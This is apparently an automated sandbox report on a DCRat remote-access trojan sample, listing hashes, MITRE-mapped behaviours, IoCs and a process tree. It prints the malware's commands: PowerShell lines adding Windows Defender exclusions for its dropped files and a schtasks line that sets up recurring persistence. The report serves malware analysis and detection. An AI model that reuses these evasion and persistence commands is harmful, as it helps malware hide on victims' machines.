dcrat | b7b11a65bec44bfb29fa4f96f57ffafbd7c0907ecf53ac73fc17efe0254e20eb

Analysis

max time kernel
148s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
22/12/2024, 09:57 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

JaffaCakes118_b7b11a65bec44bfb29fa4f96f57ffafbd7c0907ecf53ac73fc17efe0254e20eb.exe
Size

1.3MB
MD5

e58bb52089006e217b7652c510c431aa
SHA1

111af809f5c34e4eb1900814999c504f50f38189
SHA256

b7b11a65bec44bfb29fa4f96f57ffafbd7c0907ecf53ac73fc17efe0254e20eb
SHA512

11206de1ad8de98c7ce03633df6c0572a97d8af62ca029f4ced31774f6c2fd15fc9af794bcf9955ed1a2bb3c92afb7ebbc42a013d857a6faf7de848f62bcf641
SSDEEP

24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg

Score

10^/10

dcrat discovery execution infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Process spawned unexpected child process 9 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3988	1728	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2728	1728	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3676	1728	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1256	1728	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5076	1728	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4888	1728	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2360	1728	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2208	1728	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2864	1728	schtasks.exe	86

DCRat payload 2 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral2/files/0x0007000000023cb1-9.dat	dcrat
behavioral2/memory/368-13-0x0000000000050000-0x0000000000160000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3992	powershell.exe
872	powershell.exe
4768	powershell.exe
2504	powershell.exe

Checks computer location settings 2 TTPs 18 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	conhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	conhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	conhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	conhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	conhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	conhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	conhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	conhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	conhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	conhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	conhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	conhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	conhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	DllCommonsvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	conhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	JaffaCakes118_b7b11a65bec44bfb29fa4f96f57ffafbd7c0907ecf53ac73fc17efe0254e20eb.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	conhost.exe

Executes dropped EXE 16 IoCs

pid	Process
368	DllCommonsvc.exe
2288	conhost.exe
4060	conhost.exe
2728	conhost.exe
3208	conhost.exe
3728	conhost.exe
1428	conhost.exe
2984	conhost.exe
1452	conhost.exe
4720	conhost.exe
5008	conhost.exe
4176	conhost.exe
1572	conhost.exe
60	conhost.exe
4036	conhost.exe
4588	conhost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 16 IoCs

Web Service

T1102

flow	ioc
25	raw.githubusercontent.com
40	raw.githubusercontent.com
41	raw.githubusercontent.com
15	raw.githubusercontent.com
47	raw.githubusercontent.com
53	raw.githubusercontent.com
55	raw.githubusercontent.com
16	raw.githubusercontent.com
56	raw.githubusercontent.com
58	raw.githubusercontent.com
38	raw.githubusercontent.com
44	raw.githubusercontent.com
45	raw.githubusercontent.com
46	raw.githubusercontent.com
54	raw.githubusercontent.com
57	raw.githubusercontent.com

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe	DllCommonsvc.exe
File opened for modification	C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe	DllCommonsvc.exe
File created	C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\088424020bedd6	DllCommonsvc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JaffaCakes118_b7b11a65bec44bfb29fa4f96f57ffafbd7c0907ecf53ac73fc17efe0254e20eb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies registry class 16 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	conhost.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	conhost.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	conhost.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	JaffaCakes118_b7b11a65bec44bfb29fa4f96f57ffafbd7c0907ecf53ac73fc17efe0254e20eb.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	conhost.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	conhost.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	conhost.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	conhost.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	conhost.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	conhost.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	conhost.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	conhost.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	conhost.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	conhost.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	conhost.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	conhost.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3676	schtasks.exe
4888	schtasks.exe
2360	schtasks.exe
2864	schtasks.exe
2728	schtasks.exe
1256	schtasks.exe
5076	schtasks.exe
2208	schtasks.exe
3988	schtasks.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
368	DllCommonsvc.exe
368	DllCommonsvc.exe
368	DllCommonsvc.exe
368	DllCommonsvc.exe
368	DllCommonsvc.exe
368	DllCommonsvc.exe
4768	powershell.exe
2504	powershell.exe
872	powershell.exe
3992	powershell.exe
2288	conhost.exe
2504	powershell.exe
4768	powershell.exe
872	powershell.exe
3992	powershell.exe
4060	conhost.exe
2728	conhost.exe
3208	conhost.exe
3728	conhost.exe
1428	conhost.exe
2984	conhost.exe
1452	conhost.exe
4720	conhost.exe
5008	conhost.exe
4176	conhost.exe
1572	conhost.exe
60	conhost.exe
4036	conhost.exe
4588	conhost.exe

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeDebugPrivilege	368	DllCommonsvc.exe
Token: SeDebugPrivilege	4768	powershell.exe
Token: SeDebugPrivilege	2504	powershell.exe
Token: SeDebugPrivilege	3992	powershell.exe
Token: SeDebugPrivilege	872	powershell.exe
Token: SeDebugPrivilege	2288	conhost.exe
Token: SeDebugPrivilege	4060	conhost.exe
Token: SeDebugPrivilege	2728	conhost.exe
Token: SeDebugPrivilege	3208	conhost.exe
Token: SeDebugPrivilege	3728	conhost.exe
Token: SeDebugPrivilege	1428	conhost.exe
Token: SeDebugPrivilege	2984	conhost.exe
Token: SeDebugPrivilege	1452	conhost.exe
Token: SeDebugPrivilege	4720	conhost.exe
Token: SeDebugPrivilege	5008	conhost.exe
Token: SeDebugPrivilege	4176	conhost.exe
Token: SeDebugPrivilege	1572	conhost.exe
Token: SeDebugPrivilege	60	conhost.exe
Token: SeDebugPrivilege	4036	conhost.exe
Token: SeDebugPrivilege	4588	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4136 wrote to memory of 4808	4136	JaffaCakes118_b7b11a65bec44bfb29fa4f96f57ffafbd7c0907ecf53ac73fc17efe0254e20eb.exe	82
PID 4136 wrote to memory of 4808	4136	JaffaCakes118_b7b11a65bec44bfb29fa4f96f57ffafbd7c0907ecf53ac73fc17efe0254e20eb.exe	82
PID 4136 wrote to memory of 4808	4136	JaffaCakes118_b7b11a65bec44bfb29fa4f96f57ffafbd7c0907ecf53ac73fc17efe0254e20eb.exe	82
PID 4808 wrote to memory of 3888	4808	WScript.exe	83
PID 4808 wrote to memory of 3888	4808	WScript.exe	83
PID 4808 wrote to memory of 3888	4808	WScript.exe	83
PID 3888 wrote to memory of 368	3888	cmd.exe	85
PID 3888 wrote to memory of 368	3888	cmd.exe	85
PID 368 wrote to memory of 2504	368	DllCommonsvc.exe	96
PID 368 wrote to memory of 2504	368	DllCommonsvc.exe	96
PID 368 wrote to memory of 3992	368	DllCommonsvc.exe	97
PID 368 wrote to memory of 3992	368	DllCommonsvc.exe	97
PID 368 wrote to memory of 4768	368	DllCommonsvc.exe	98
PID 368 wrote to memory of 4768	368	DllCommonsvc.exe	98
PID 368 wrote to memory of 872	368	DllCommonsvc.exe	99
PID 368 wrote to memory of 872	368	DllCommonsvc.exe	99
PID 368 wrote to memory of 2288	368	DllCommonsvc.exe	104
PID 368 wrote to memory of 2288	368	DllCommonsvc.exe	104
PID 2288 wrote to memory of 2052	2288	conhost.exe	105
PID 2288 wrote to memory of 2052	2288	conhost.exe	105
PID 2052 wrote to memory of 3632	2052	cmd.exe	107
PID 2052 wrote to memory of 3632	2052	cmd.exe	107
PID 2052 wrote to memory of 4060	2052	cmd.exe	112
PID 2052 wrote to memory of 4060	2052	cmd.exe	112
PID 4060 wrote to memory of 4984	4060	conhost.exe	115
PID 4060 wrote to memory of 4984	4060	conhost.exe	115
PID 4984 wrote to memory of 4020	4984	cmd.exe	117
PID 4984 wrote to memory of 4020	4984	cmd.exe	117
PID 4984 wrote to memory of 2728	4984	cmd.exe	118
PID 4984 wrote to memory of 2728	4984	cmd.exe	118
PID 2728 wrote to memory of 2248	2728	conhost.exe	121
PID 2728 wrote to memory of 2248	2728	conhost.exe	121
PID 2248 wrote to memory of 3228	2248	cmd.exe	123
PID 2248 wrote to memory of 3228	2248	cmd.exe	123
PID 2248 wrote to memory of 3208	2248	cmd.exe	124
PID 2248 wrote to memory of 3208	2248	cmd.exe	124
PID 3208 wrote to memory of 2204	3208	conhost.exe	125
PID 3208 wrote to memory of 2204	3208	conhost.exe	125
PID 2204 wrote to memory of 3664	2204	cmd.exe	127
PID 2204 wrote to memory of 3664	2204	cmd.exe	127
PID 2204 wrote to memory of 3728	2204	cmd.exe	128
PID 2204 wrote to memory of 3728	2204	cmd.exe	128
PID 3728 wrote to memory of 1124	3728	conhost.exe	129
PID 3728 wrote to memory of 1124	3728	conhost.exe	129
PID 1124 wrote to memory of 1856	1124	cmd.exe	131
PID 1124 wrote to memory of 1856	1124	cmd.exe	131
PID 1124 wrote to memory of 1428	1124	cmd.exe	132
PID 1124 wrote to memory of 1428	1124	cmd.exe	132
PID 1428 wrote to memory of 1756	1428	conhost.exe	133
PID 1428 wrote to memory of 1756	1428	conhost.exe	133
PID 1756 wrote to memory of 1556	1756	cmd.exe	135
PID 1756 wrote to memory of 1556	1756	cmd.exe	135
PID 1756 wrote to memory of 2984	1756	cmd.exe	136
PID 1756 wrote to memory of 2984	1756	cmd.exe	136
PID 2984 wrote to memory of 4092	2984	conhost.exe	137
PID 2984 wrote to memory of 4092	2984	conhost.exe	137
PID 4092 wrote to memory of 1300	4092	cmd.exe	139
PID 4092 wrote to memory of 1300	4092	cmd.exe	139
PID 4092 wrote to memory of 1452	4092	cmd.exe	140
PID 4092 wrote to memory of 1452	4092	cmd.exe	140
PID 1452 wrote to memory of 4956	1452	conhost.exe	141
PID 1452 wrote to memory of 4956	1452	conhost.exe	141
PID 4956 wrote to memory of 2792	4956	cmd.exe	143
PID 4956 wrote to memory of 2792	4956	cmd.exe	143

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_b7b11a65bec44bfb29fa4f96f57ffafbd7c0907ecf53ac73fc17efe0254e20eb.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_b7b11a65bec44bfb29fa4f96f57ffafbd7c0907ecf53ac73fc17efe0254e20eb.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4136
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\providercommon\1zu9dW.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3888
  - - C:\providercommon\DllCommonsvc.exe
      "C:\providercommon\DllCommonsvc.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:368
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2504
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3992
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\TextInputHost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4768
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\SppExtComObj.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:872
    - - C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe
        
        "C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2288
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8UyA8TRco5.bat"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2052
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:3632
        
        C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe
        
        "C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4060
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\pksuDlslcW.bat"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:4984
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        9⤵
        
        PID:4020
        
        C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe
        
        "C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2728
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\xZLz5Ote6t.bat"
        10⤵
        Suspicious use of WriteProcessMemory
        
        PID:2248
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        11⤵
        
        PID:3228
        
        C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe
        
        "C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe"
        11⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3208
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CL2HVdYORd.bat"
        12⤵
        Suspicious use of WriteProcessMemory
        
        PID:2204
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        13⤵
        
        PID:3664
        
        C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe
        
        "C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe"
        13⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3728
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ljgkLFIn4v.bat"
        14⤵
        Suspicious use of WriteProcessMemory
        
        PID:1124
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        15⤵
        
        PID:1856
        
        C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe
        
        "C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe"
        15⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1428
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uSow6ZWML2.bat"
        16⤵
        Suspicious use of WriteProcessMemory
        
        PID:1756
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        17⤵
        
        PID:1556
        
        C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe
        
        "C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe"
        17⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2984
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\V68XQM6FdC.bat"
        18⤵
        Suspicious use of WriteProcessMemory
        
        PID:4092
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        19⤵
        
        PID:1300
        
        C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe
        
        "C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe"
        19⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1452
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\4NR89d4K3E.bat"
        20⤵
        Suspicious use of WriteProcessMemory
        
        PID:4956
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        21⤵
        
        PID:2792
        
        C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe
        
        "C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe"
        21⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4720
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\5EJ4eIa89C.bat"
        22⤵
        
        PID:4704
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        23⤵
        
        PID:1828
        
        C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe
        
        "C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe"
        23⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5008
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\RE4R3BzSze.bat"
        24⤵
        
        PID:2364
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        25⤵
        
        PID:5020
        
        C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe
        
        "C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe"
        25⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4176
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\WqeaogqjWu.bat"
        26⤵
        
        PID:2176
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        27⤵
        
        PID:2056
        
        C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe
        
        "C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe"
        27⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1572
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dk6czFnjgV.bat"
        28⤵
        
        PID:1832
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        29⤵
        
        PID:5044
        
        C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe
        
        "C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe"
        29⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:60
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\kYBl3UyOdq.bat"
        30⤵
        
        PID:3120
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        31⤵
        
        PID:2956
        
        C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe
        
        "C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe"
        31⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4036
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8UyA8TRco5.bat"
        32⤵
        
        PID:4040
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        33⤵
        
        PID:384
        
        C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe
        
        "C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe"
        33⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4588
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\TA6UjH3MJQ.bat"
        34⤵
        
        PID:1264
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        35⤵
        
        PID:2472

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\conhost.exe'" /f
1⤵
